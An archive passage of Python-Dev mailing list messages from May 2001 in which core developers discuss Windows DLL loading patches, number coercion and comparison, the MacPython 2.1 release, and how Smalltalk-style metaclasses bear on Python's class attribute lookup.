In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com>
References: <15126.41505.987887.477670@beluga.mojam.com>
	<20010531160821.A10314@thyrsus.com>
Message-ID: <15126.45298.666556.20710@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > or try to register them using GenericBrowser.  Users are apparently not the
 > only people setting BROWSER, so the comment in the code:
 > 
 >     # It's the user's responsibility to register handlers for any unknown
 >     # browser referenced by this value, before calling open().
 > 
 > seems like flawed logic to me.

Eric S. Raymond writes:
 > Fred Drake and I are co-responsible for that code.  If you want to patch it
 > to do this, I won't object.

  I wouldn't object either.  I *do* object to the system setting that
variable by default by either Mandrake or Gnome -- that's just stupid
and inconsiderate of the user.
  Now, if anyone can provide support for Nautilis, I won't object to
that either.  Unfortunately, Mandrake's installer stinks at upgrading
(it couldn't seem to locate my 7.2 installation) and I don't have the
time to figure that out.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake at acm.org  Thu May 31 23:04:30 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 17:04:30 -0400 (EDT)
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.44584.300357.360209@beluga.mojam.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
	<15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
	<15126.44584.300357.360209@beluga.mojam.com>
Message-ID: <15126.45534.417066.445852@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > Functionally, the checkin isn't a muff (it does have the change I intended),
 > but I was worried about the version number.  Should I have checked it in as
 > version 1.34.2.1 or 1.35?

  If the change should happen on the branch, leave it in.  If it's
also needed on the HEAD, check it in again there, and you're done.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From MarkH at ActiveState.com  Tue May  1 02:42:19 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Tue, 1 May 2001 10:42:19 +1000
Subject: [Python-Dev] Importing extensions on Windows 95
In-Reply-To: <3AED7248.B7386B83@lemburg.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPOEDIDLAA.MarkH@ActiveState.com>

> Here's a stab at a patch. Could you review it and test it ? I
> don't have enough knowledge of win32 for this...

I think we can drop the getcwd call here completely.

I prefer the patch below.

Mark.

Index: dynload_win.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v
retrieving revision 2.7
diff -u -r2.7 dynload_win.c
--- dynload_win.c	2000/10/05 10:54:45	2.7
+++ dynload_win.c	2001/05/01 00:36:40
@@ -163,24 +163,21 @@
 
 #ifdef MS_WIN32
 	{
-		HINSTANCE hDLL;
+		HINSTANCE hDLL = NULL;
 		char pathbuf[260];
-		if (strchr(pathname, '\\') == NULL &&
-		    strchr(pathname, '/') == NULL)
-		{
-			/* Prefix bare filename with ".\" */
-			char *p = pathbuf;
-			*p = '\0';
-			_getcwd(pathbuf, sizeof pathbuf);
-			if (*p != '\0' && p[1] == ':')
-				p += 2;
-			sprintf(p, ".\\%-.255s", pathname);
-			pathname = pathbuf;
-		}
-		/* Look for dependent DLLs in directory of pathname first */
-		/* XXX This call doesn't exist in Windows CE */
-		hDLL = LoadLibraryEx(pathname, NULL,
-				     LOAD_WITH_ALTERED_SEARCH_PATH);
+		LPTSTR dummy;
+		/* We use LoadLibraryEx so Windows looks for dependent DLLs 
+		    in directory of pathname first.  However, Windows95
+		    can sometimes not work correctly unless the absolute
+		    path is used.  If GetFullPathName() fails, the LoadLibrary
+		    will certainly fail too, so use its error code */
+		if (GetFullPathName(pathname,
+				    sizeof(pathbuf),
+				    pathbuf,
+				    &dummy))
+			/* XXX This call doesn't exist in Windows CE */
+			hDLL = LoadLibraryEx(pathname, NULL,
+					     LOAD_WITH_ALTERED_SEARCH_PATH);
 		if (hDLL==NULL){
 			char errBuf[256];
 			unsigned int errorCode;


From thomas at xs4all.net  Tue May  1 10:07:48 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 1 May 2001 10:07:48 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Python bltinmodule.c,2.198,2.199
In-Reply-To: <E14tPxo-0001LL-00@usw-pr-cvs1.sourceforge.net>; from tim_one@users.sourceforge.net on Sat, Apr 28, 2001 at 01:20:24AM -0700
References: <E14tPxo-0001LL-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <20010501100748.M16486@xs4all.nl>

On Sat, Apr 28, 2001 at 01:20:24AM -0700, Tim Peters wrote:
> Update of /cvsroot/python/python/dist/src/Python
> In directory usw-pr-cvs1:/tmp/cvs-serv4629/python/dist/src/Python
> 
> Modified Files:
> 	bltinmodule.c 
> Log Message:
> Fix buglet reported on c.l.py:  map(fnc, file.xreadlines()) blows up.
> Also a 2.1 bugfix candidate (am I supposed to do something with those?).

No, not really. You can do me a favor by writing halfway decent checkin
messages (no complaints there) and keep your fingers off the 'fix
whitespace' button :) I keep a close eye on the checkins as they happen, and
save away those that might need to be checked into the 2.1.1 branch. I'll go
over them with a fine tooth comb when I'm approaching critical release mass
:)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal at lemburg.com  Tue May  1 12:30:57 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 01 May 2001 12:30:57 +0200
Subject: [Python-Dev] Importing extensions on Windows 95
References: <LCEPIIGDJPKCOIHOBJEPOEDIDLAA.MarkH@ActiveState.com>
Message-ID: <3AEE9061.32239814@lemburg.com>

Mark Hammond wrote:
> 
> > Here's a stab at a patch. Could you review it and test it ? I
> > don't have enough knowledge of win32 for this...
> 
> I think we can drop the getcwd call here completely.
>
> I prefer the patch below.

If this works as expected, please check in the patch. (Note that
I have not tested the patch I posted -- I've never used VC++ for
anything else than compiling C extensions and GMP.)
 
> Mark.
> 
> Index: dynload_win.c
> ===================================================================
> RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v
> retrieving revision 2.7
> diff -u -r2.7 dynload_win.c
> --- dynload_win.c       2000/10/05 10:54:45     2.7
> +++ dynload_win.c       2001/05/01 00:36:40
> @@ -163,24 +163,21 @@
> 
>  #ifdef MS_WIN32
>         {
> -               HINSTANCE hDLL;
> +               HINSTANCE hDLL = NULL;
>                 char pathbuf[260];
> -               if (strchr(pathname, '\\') == NULL &&
> -                   strchr(pathname, '/') == NULL)
> -               {
> -                       /* Prefix bare filename with ".\" */
> -                       char *p = pathbuf;
> -                       *p = '\0';
> -                       _getcwd(pathbuf, sizeof pathbuf);
> -                       if (*p != '\0' && p[1] == ':')
> -                               p += 2;
> -                       sprintf(p, ".\\%-.255s", pathname);
> -                       pathname = pathbuf;
> -               }
> -               /* Look for dependent DLLs in directory of pathname first */
> -               /* XXX This call doesn't exist in Windows CE */
> -               hDLL = LoadLibraryEx(pathname, NULL,
> -                                    LOAD_WITH_ALTERED_SEARCH_PATH);
> +               LPTSTR dummy;
> +               /* We use LoadLibraryEx so Windows looks for dependent DLLs
> +                   in directory of pathname first.  However, Windows95
> +                   can sometimes not work correctly unless the absolute
> +                   path is used.  If GetFullPathName() fails, the LoadLibrary
> +                   will certainly fail too, so use its error code */
> +               if (GetFullPathName(pathname,
> +                                   sizeof(pathbuf),
> +                                   pathbuf,
> +                                   &dummy))
> +                       /* XXX This call doesn't exist in Windows CE */
> +                       hDLL = LoadLibraryEx(pathname, NULL,
> +                                            LOAD_WITH_ALTERED_SEARCH_PATH);
>                 if (hDLL==NULL){
>                         char errBuf[256];
>                         unsigned int errorCode;

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Tue May  1 23:22:11 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 01 May 2001 23:22:11 +0200
Subject: [Python-Dev] Coercion and comparison of numbers
Message-ID: <3AEF2903.79308F55@lemburg.com>

I just received a bug report for mx.Number which revealed a
probelm with the comparison code in Python 2.1. Looking at
the code it seems that one of my original coercion patches
did not make it into the core. I added a new API PyNumber_Compare()
knows about the new coercion mechanism and should be called for
numbers instead of trying coercion in PyObject_Compare().

Was this part of the coercion patch left out on purpose or
a simple oversight ? I hope the latter... 

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From jack at oratrix.nl  Tue May  1 23:23:59 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Tue,  1 May 2001 23:23:59 +0200 (MET DST)
Subject: [Python-Dev] MacPython 2.1 released
Message-ID: <20010501212359.792FADDDF0@oratrix.oratrix.nl>

MacPython 2.1 is available for download. Get it via
http://www.cwi.nl/~jack/macpython.html .


Python is a high-level programming language that is suitable for
simple scripting tasks as well as writing large
applications. MacPython offers alot of Mac-specific extensions,
including access to all major MacOS Toolbox modules (QuickDraw,
QuickTime, AppleScript and many more), an Integrated Development
Environment (in Python!), frameworks for windowing applications,
unix-compatible cgi-scripting, image-manipulation libraries, numerical
libraries, tk-based machine independent windowing and lots more. It
also uniquely among Pythons allows you to create fully selfcontained
(and, hence, distributable) applications without needing a C compiler
or anything.

New in this version:
- A choice of Carbon or Classic runtime, so runs on anything between
  MacOS 8.1 and MacOS X
- Distutils support for easy installation of extension packages
- BBedit language plugin
- All the platform-independent Python 2.1 mods
- New version of Numeric
- Lots of bug fixes
- Choice of normal and active installer

Please send feedback on this release to pythonmac-sig at python.org,
where all the MacPythoneers hang out.

Enjoy,


--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From guido at digicool.com  Wed May  2 02:52:29 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 19:52:29 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
Message-ID: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>

Jim Althoff (a big commercial user of J[P]ython) sent me a summary of
how metaclasses work in Smalltalk.  He should know, since he invented
them! :-)  I include it below, with his permission.

While implementing more class-like behavior for built-in types in the
experimental descr-branch in the 2.2 CVS tree, I've noticed problems
caused by Python's collapsing of class attributes and instance
attributes.

For example, suppose d is a dictionary.  My experimental changes make
d.__class__ return DictType (from the types module).
(DictType.__class__ is TypeType, by the way.)  I also added special
methods.  For example, d.__repr__() now returns repr(d).  I am
preparing for subclassing of built-in types, so I will eventually be
able to derive a class MyDictType from DictType, as follows:

class MyDictType(DictType):
  ...

Now comes the fun part.  Suppose MyDictType wants to define its own
repr():

class MyDictType(DictType):
  def __repr__(self):
    return "MyDictType(%s)" % DictType.__repr__(self)

But, (surprise, surprise!), DictType itself also has a __repr__()
method: it returns the string "<type 'dictionary'>".

So the above code would fail: DictType.__repr__() returns
repr(DictType), and DictType.__repr__(self) raises an argument count
error.  The correct __repr__ method for dictionary objects can be
found as DictType.__dict__['__repr__'], but that looks hideous!

What to do?  Pragmatically, I can make DictType.__repr__ return
DictType.__dict__['__repr__'], and all will be well in this example.
But we have to tread carefully here: DictType.__class__ is TypeType,
but DictType.__dict__['__class__'] is a descriptor for the __class__
attribute on dictionary objects.

The best rule I can think of so far is that DictType.__dict__ gives
the *true* set of attribute descriptors for dictionary objects, and is
thus similar to Smalltalks's class.methodDict that Jim describes
below.  DictType.foo is a shortcut that can resolve to either
DictType.__dict__['foo'] or to an attribute (maybe a method) of
DictType described in TypeType.__dict__['foo'], whichever is defined.
If both are defined, I propose the following, clumsy but backwards
compatible rule: if DictType.__dict__['foo'] describes a method, it
wins.  Otherwise, TypeType.__dict__['foo'] wins.

Sigh.

--Guido van Rossum (home page: http://www.python.org/~guido/)

------------------------- Jim Althoff's message ---------------------------

Hi Guido,

I was reading the discussion on class methods in the python-dev archive and
noticed your question about how Smalltalk determines the difference between
instance methods and class methods.  I have some info on this which I can't
post to python-dev, not being a member; but I thought you might be
interested in it anyway.

It turns out that I am the one that devised metaclasses in Smalltalk-80.
(On the other hand, I haven't looked at any Smalltalk implementation code
in a long time so this is merely a description of how it all started.)

Basically (I think) Smalltalk doesn't have the ambiguity you mention for
instance methods versus class methods (as Python would) because Smalltalk
doesn't do method lookup the same as Python does.

To illustrate, suppose you have object.method()  (using Python-style
syntax)

The Smalltalk method lookup is as follows:
o find the class that object is an instance of  --  this resulting thing is
a "class object" (a first-class object, same as in Python)
o since class is a "class object" one of its fields will be a dict of
methods -- let's call it class.methodDict
o find method in class.methodDict
o if found, execute method on object
o if not, do the same thing traversing the (single inheritance) superclass
chain (follow class.superClass)

I believe Python works roughly as follows (Just testing my own
understanding here -- correct me if I don't get it right):
o convert (conceptually at least) object.method() into object.
__class__.method(object)
o find a _function_ corresponding to method in object.__class__.__dict__
o if found, execute the found function (with object bound as the first arg
to function)
o if not, traverse the (multiple inheritance) superclass chain (depth
first)

I think the key difference is that Python treats object.method() the same
as it treats object.__class__.method(object).  Smalltalk doesn't do this.
In Smalltalk, object.__class__.method(object) would mean:
o consider object.__class__ to be an "object" like any other "object" in
Smalltalk (which it is)
o get the "class object" of object.__class__ , namely object.
__class__.class__
o find method in object.__class__.__class__.methodDict
o if found, execute the method on object.__class__
o if not, do the same thing traversing the (single inheritance) superclass
chain (follow object.__class__.__class__.superClass)

In other words, it exactly the same lookup mechanism.  So there is no
ambiguity.

To summarize, in Smalltalk:

o instance methods (for instances that are not "class objects") are
specified by:  instance.instanceMethod()

o class methods are specified by:  class.classMethod()

o both of these are just object.objectMethod() since classes are objects
and the method lookup mechanism is no different from that of any other kind
of object.

A concrete example:

If I have a class Date in Smalltalk and an instance of it referenced by
variable, d.  I would do:
o d.followingDate() for an instance method, and
o Date.currentDate() for a class method

I think this is a nice, conceptually simple model.   Things get
interesting, though, when you start to consider how the mechanism of class.
__class__  -- which is the thing that makes class methods no different than
instance methods  -- actually works.  And this leads to metaclasses in
Smalltalk.

Here's a rough sketch of how metaclasses work:

Standard principles of Smalltalk:
o everything is an object (first-class)
o every object is an instance of a class
o a class inherits (single-inheritance) from its superclass (except the
root class Object, which has no superclass)
o methods can be invoked on a object.  All such methods are defined as part
of the object's class definition (or a class going up the superclass chain)

Because of the first 2 principles above:
o every class is an object (because everything is an object)
o every class is, itself, an instance of some class (because every object
is an instance of a class)

Originally in Smalltalk-76,  there was one metaclass, Class. All classes
(class objects) were instances of Class.  Class was an instance of itself.
Class had methods defined for it just like all classes did.  In particular,
it had a method "new" -- this being the method that creates instances of
classes.  So suppose you had class Rectangle.  Rectangle is an instance of
Class (hence it is a class object).  If you wanted to create an instance of
Rectangle, you would do: myRect = Rectangle.new().   This would mean: "find
the 'new' method in the definition of Rectangle's class (Class) and invoke
it on Rectangle (which is a class object).  The result is a Rectangle
instance which is assigned to the variable myRect.  The Rectangle class
object held data (state -- same rules as any other kind of object) -- such
as number and name of fields its instances would have, a dictionary of
methods for its instances, etc.  So the "new" method in Class would have
access to all the info it needed to create a Rectangle instance (as opposed
to a Point instance, for example).

The limitation with this scheme was that all classes had to share exactly
the same methods, namely all the methods defined in Class.  The method
"new" was one of these methods along with lots of  "reflection-type"
methods for class creation, modification, and inspection.  But if you
wanted an "application-oriented" class method -- like Date.currentDate() --
you couldn't do that because then the method "currentDate" would be shared
amongst all class objects (instances of Class) and wouldn't make any sense
(e.g., Rectangle.currentDate()).

In Smalltalk-80 I added a more flexible mechanism which we called
metaclasses (we hadn't used that terminology previously for the single
Class although it was a "metaclass").  The thing that everyone in the
Smalltalk development team liked about the new metaclass mechanism at the
time was that it didn't require any new basic principles for Smalltalk.  It
was all done using the same basic principles of Smalltalk listed above.
The idea was to use subclassing to allow for different methods for
different instances of Class.  A "metaclass" simply became a subclass of
Class.  Each class object then ended up being a singleton instance
(although the "singleton-ness" was not mandatory) of a metaclass (i.e., a
subclass of Class).  So class objects were no longer _all_ instances of the
_same_ class (Class).  Each was an instance of a corresponding subclass of
Class -- that is to say, an instance of a metaclass.

The Smalltalk-80 class hierarchy looked like the following:
(This is actually a simplification.  The actually hierarchy has a little
more factoring and I changed the names for more clarity).

First a digression on some terminology:
o a class is an object that can be instantiated
o a metaclass is a class and one such that when it is instantiated, the
instanced is itself a class
o a plain-object is one that cannot be instantiated  (I'm just making this
term up).
o a plain-class is one that is a class but is not a metaclass  (making this
up, too).

In the list below, indentation indicates class hieararchy (superclass --
subclass)

plain-class
----------------
<none>
o Class
   o  Object                                                   isInstanceOf
o ObjectMetaClass                     isInstanceOf  MetaClass
        o Class                                                isInstanceOf
o ClassMetaClass                    isInstanceOf  MetaClass
            o MetaClass                                  isInstanceOf
o MetaClassMetaClass      isInstanceOf  MetaClass
        . . .
        o Rectangle                                        isInstanceOf
o RectangleMetaClass          isInstanceOf  MetaClass
            o SpecializedRectangle            isInstanceOf
o SpecializedRectangleMetaClass  isInstanceOf  MetaClass
All "metaclasses" are instances of MetaClass.  All "plain-classes" (those
that are not "metaclasses") are instances of a "metaclass".  Because of
this there are parallel class hierarchies between "plain-classes" and their
corresponding "metaclasses".  Note that MetaClass is a "plain-class" and
not a "metaclass".  Also note that MetaClass (being a "plain-class") is an
instance of its corresponding "metaclass" MetaClassMetaClass.  And
MetaClassMetaClass is an instance of MetaClass (because MetaClassMetaClass
_is_ a "metaclass").  The MetaClass / MetaClassMetaClass class/instance
relationship is circular.

An example.   If you want a Rectangle class you first make a metaclass for
it, RectangleMetaClass  -- actually, the system does this for you
automatically as part of the class creation method implementation (when you
define the class Rectangle, for example).  RectangleMetaClass is an
instance of MetaClass so all the methods defined in MetaClass are available
to it.  RectangleMetaClass can also define its own methods now  (because it
is a class) which would be invoked on any (typically one) instance of
RectangleMetaClass, which in this case is going to be class Rectangle.  You
then make your Rectangle class by making an instance of RectangleMetaClass
(conceptually doing:  Rectangle = RectangleMetaClass.new()  ).   Now you
can make instances of Rectangle, doing:  myRect = Rectangle.new() as
before.  This is not so different from the Smalltalk-76 mechanism.  The
main advantage is that you now have a specific class, RectangleMetaClass,
that can have methods specific to the class Rectangle (the instance of
RectangleMetaClass).  So you could define a method like
"newFromPointToPoint" for example and then do:  myRect =
Rectangle.newFromPointToPoint(point1,point2).  The meaning is the same as
always: take the variable "Rectangle", find out what it is pointing to.  It
is pointing to an instance of the RectangleMetaClass.  Find the method
"newFromPointToPoint" as part of the definition of RectangleMetaClass (it
being a class object).  Invoke this method on the Rectangle class object --
which then creates a Rectangle instance.  The same would go for the other
example: Date.currentDate().

So the bottom line is (I think) that the Smalltalk method lookup mechanism
doesn't have to resolve an ambiguity because all methods that get invoked
on an object always come from the object's definition class (or superclass)
and from no other place.

Hope this helps,

Jim


From guido at digicool.com  Wed May  2 03:29:28 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 20:29:28 -0500
Subject: [Python-Dev] Coercion and comparison of numbers
In-Reply-To: Your message of "Tue, 01 May 2001 23:22:11 +0200."
             <3AEF2903.79308F55@lemburg.com> 
References: <3AEF2903.79308F55@lemburg.com> 
Message-ID: <200105020129.UAA24690@cj20424-a.reston1.va.home.com>

> I just received a bug report for mx.Number which revealed a
> probelm with the comparison code in Python 2.1. Looking at
> the code it seems that one of my original coercion patches
> did not make it into the core. I added a new API PyNumber_Compare()
> knows about the new coercion mechanism and should be called for
> numbers instead of trying coercion in PyObject_Compare().
> 
> Was this part of the coercion patch left out on purpose or
> a simple oversight ? I hope the latter... 

Hard to say.  I don't think I paid very close attention to your patch;
Neil did, but I changed a lot of the code around coercions and
comparisons in order to implement rich comparisons.  So, several
things may have happened: Neil lost it; Neil decided against it; or I
ripped it out.

Can you elucidate me regarding the issues?  (If there's code, please
quote it or link to a specific patch.)  Since the concept of "number"
is ill-defined at best, when exactly should PyNumber_Compare() be
called?  What is it supposed to do?  Does it need a rich cousin?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas at python.ca  Wed May  2 02:42:15 2001
From: nas at python.ca (Neil Schemenauer)
Date: Tue, 1 May 2001 17:42:15 -0700
Subject: [Python-Dev] Coercion and comparison of numbers
In-Reply-To: <200105020129.UAA24690@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Tue, May 01, 2001 at 08:29:28PM -0500
References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com>
Message-ID: <20010501174215.A9565@glacier.fnational.com>

[MAL]
> I just received a bug report for mx.Number which revealed a
> probelm with the comparison code in Python 2.1. Looking at
> the code it seems that one of my original coercion patches
> did not make it into the core. I added a new API PyNumber_Compare()
> knows about the new coercion mechanism and should be called for
> numbers instead of trying coercion in PyObject_Compare().

I remember the API.  I don't remember what happened to it.  Guido
might have dropped it or I might have taken it out thinking the
comparison issues would be sorted out by Guido.

Why is a new API needed?  Why can't PyObject_Compare() do the
right thing (ie. not coerce new style numbers)?

  Neil


From guido at digicool.com  Wed May  2 03:55:59 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 20:55:59 -0500
Subject: [Python-Dev] Slight wart in __all__
In-Reply-To: Your message of "Sun, 29 Apr 2001 12:14:43 +1000."
             <LCEPIIGDJPKCOIHOBJEPKEBEDLAA.MarkH@ActiveState.com> 
References: <LCEPIIGDJPKCOIHOBJEPKEBEDLAA.MarkH@ActiveState.com> 
Message-ID: <200105020155.UAA25687@cj20424-a.reston1.va.home.com>

> Would it make sense to a explicitly raise a more meaningful exception here
> if __all__ doesnt contain strings?

Definitely.  Be my guest.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg at cosc.canterbury.ac.nz  Wed May  2 03:22:47 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 02 May 2001 13:22:47 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
Message-ID: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>

Guido:

> If both are defined, I propose the following, clumsy but backwards
> compatible rule: if DictType.__dict__['foo'] describes a method, it
> wins.  Otherwise, TypeType.__dict__['foo'] wins.

Yeek! I think that's far too confusing a rule. I suppose
it might do in the meantime, but we'd better have a long
term solution in mind before going too far down this
route.

Ultimately it seems like we'll have to introduce a separate
namespace for methods and default instance attributes,
say __classdict__. Then lookup of x.foo would look
first in x.__dict__, then x.__class__.__classdict__,
etc up the inheritance chain.

Then we'll have to resolve the ambiguity of the class.foo
syntax. The bravest way would be simply to change the syntax
for getting unbound methods.

The most common use for these seems to be for calling
inherited methods, so perhaps something like

   inherited MyBaseClass.foo(arg, ...)

which would be equivalent to

   getmethod(MyBaseClass, 'foo')(self, arg, ...)

where getmethod() is a new builtin like getattr()
except that it looks in the __classdict__, and 'self'
is really whatever the first argument of the containing
method was.

Now that we have __future__, would such a change be
contemplatable? Or is it too radical to even think
about?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From guido at digicool.com  Wed May  2 04:48:43 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 21:48:43 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 13:22:47 +1200."
             <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> 
Message-ID: <200105020248.VAA30315@cj20424-a.reston1.va.home.com>

> Guido:
> 
> > If both are defined, I propose the following, clumsy but backwards
> > compatible rule: if DictType.__dict__['foo'] describes a method, it
> > wins.  Otherwise, TypeType.__dict__['foo'] wins.

Greg Ewing:

> Yeek! I think that's far too confusing a rule. I suppose
> it might do in the meantime, but we'd better have a long
> term solution in mind before going too far down this
> route.

I agree 100%.  I had to do something quick to be able to make progress
with my PEP 252 project, but it's a clear indication that there's a
problem!

> Ultimately it seems like we'll have to introduce a separate
> namespace for methods and default instance attributes,
> say __classdict__. Then lookup of x.foo would look
> first in x.__dict__, then x.__class__.__classdict__,
> etc up the inheritance chain.

Except that sometimes you really do want x.__class__.__classdict__ to
have priority (e.g. for "guarded" attributes).

> Then we'll have to resolve the ambiguity of the class.foo
> syntax. The bravest way would be simply to change the syntax
> for getting unbound methods.

Agreed again.

> The most common use for these seems to be for calling
> inherited methods, so perhaps something like
> 
>    inherited MyBaseClass.foo(arg, ...)
> 
> which would be equivalent to
> 
>    getmethod(MyBaseClass, 'foo')(self, arg, ...)
> 
> where getmethod() is a new builtin like getattr()
> except that it looks in the __classdict__, and 'self'
> is really whatever the first argument of the containing
> method was.

The second most common use is to reference class variables
(e.g. imagine a class that keeps counters of how many instances have
been created and deleted in C.initcount and C.delcount).  But these
should not have to change, since they really are class attributes.

> Now that we have __future__, would such a change be contemplatable?
> Or is it too radical to even think about?

If we can find a way to spell "super.method", we should be ready for
the future.  I can't think of something right off the bat
unfortunately.

But the issue of backwards compatibility is a big one here: the idioms
for calling base class methods and using class variables as defaults
for instance variables are so common that we will have to support
these for many future versions!  (Two things I am not looking forward
to: fixing all the Zope code that uses this, and telling the author of
Programming Python, 2nd. ed.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg at cosc.canterbury.ac.nz  Wed May  2 04:48:20 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 02 May 2001 14:48:20 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105020248.VAA30315@cj20424-a.reston1.va.home.com>
Message-ID: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz>

Guido:

> Except that sometimes you really do want x.__class__.__classdict__ to
> have priority (e.g. for "guarded" attributes).

What's a "guarded" attribute?

> But the issue of backwards compatibility is a big one here

I was thinking that, while this is still in the __future__,
the __dict__ attribute would be a pseudo-dict that, by
default, behaves like the union of the old __dict__ and
the __classdict__.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From mal at lemburg.com  Wed May  2 09:59:03 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 09:59:03 +0200
Subject: [Python-Dev] Coercion and comparison of numbers
References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com> <20010501174215.A9565@glacier.fnational.com>
Message-ID: <3AEFBE47.A847C5D2@lemburg.com>

Neil Schemenauer wrote:
> 
> [MAL]
> > I just received a bug report for mx.Number which revealed a
> > probelm with the comparison code in Python 2.1. Looking at
> > the code it seems that one of my original coercion patches
> > did not make it into the core. I added a new API PyNumber_Compare()
> > knows about the new coercion mechanism and should be called for
> > numbers instead of trying coercion in PyObject_Compare().
> 
> I remember the API.  I don't remember what happened to it.  Guido
> might have dropped it or I might have taken it out thinking the
> comparison issues would be sorted out by Guido.

Good; so there's a chance for getting it back in :-)
 
> Why is a new API needed?  Why can't PyObject_Compare() do the
> right thing (ie. not coerce new style numbers)?

I think the reason for implementing number compares as separate
API was to simply shift out code from PyObject_Compare() into
a new function, not so much motivated by some higher level need
to do number compares.

[Guido]
> > Was this part of the coercion patch left out on purpose or
> > a simple oversight ? I hope the latter... 
> 
> Hard to say.  I don't think I paid very close attention to your patch;
> Neil did, but I changed a lot of the code around coercions and
> comparisons in order to implement rich comparisons.  So, several
> things may have happened: Neil lost it; Neil decided against it; or I
> ripped it out.
> 
> Can you elucidate me regarding the issues?  (If there's code, please
> quote it or link to a specific patch.)  Since the concept of "number"
> is ill-defined at best, when exactly should PyNumber_Compare() be
> called?  What is it supposed to do?  Does it need a rich cousin?

The reasoning is simple: the coercion patches basically pass
control over coercion down to the APIs in question and thus provide
the type with more information to choose from.

This is currently implemented in 2.1 for all number methods,
but not for number comparisons which do have the same problems
with centralized coercion as e.g. __add__ or other binary
operators.

Here's part of the original patch:

--- Include/orig/abstract.h	Wed May 13 00:28:58 1998
+++ Include/abstract.h	Thu May 21 12:31:55 1998
@@ -447,11 +447,18 @@ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
 	 This function always succeeds.
 
        */
 
-     PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2));
+     PyObject *PyNumber_Compare Py_PROTO((PyObject *o1, PyObject *o2));
+
+       /*
+	 Returns the result of comparing o1 and o2, or null on failure.
+	 This is the equivalent of the Python expression: cmp(o1,o2).
+       */
+
+      PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2));
 
        /*
 	 Returns the result of adding o1 and o2, or null on failure.
 	 This is the equivalent of the Python expression: o1+o2.
 
[...]

 }
 
+/* Emulate old method for comparing numeric types using coercion and
+   tp_compare. If coercion doesn't work, we use the type names as
+   comparison basis (like PyObject_Compare() does too). */
+
+static PyObject *
+_PyNumber_OldstyleCompare(PyObject *v, 
+			  PyObject *w)
+{
+    int err;
+
+    DPRINTF("_PyNumber_OldstyleCompare(%s at 0x%lx, %s at 0x%lx);\n",
+	    v->ob_type->tp_name,(long)v,
+	    w->ob_type->tp_name,(long)w);
+    err = PyNumber_CoerceEx(&v, &w);
+    if (err < 0)
+	    return NULL;
+    else if (err == 0 && v->ob_type->tp_compare) {
+	    int cmp;
+	    
+	    cmp = (*v->ob_type->tp_compare)(v, w);
+	    /* XXX Test for errors ? Looks like C types cannot raise
+	       exceptions in the compare slot... */
+	    Py_DECREF(v);
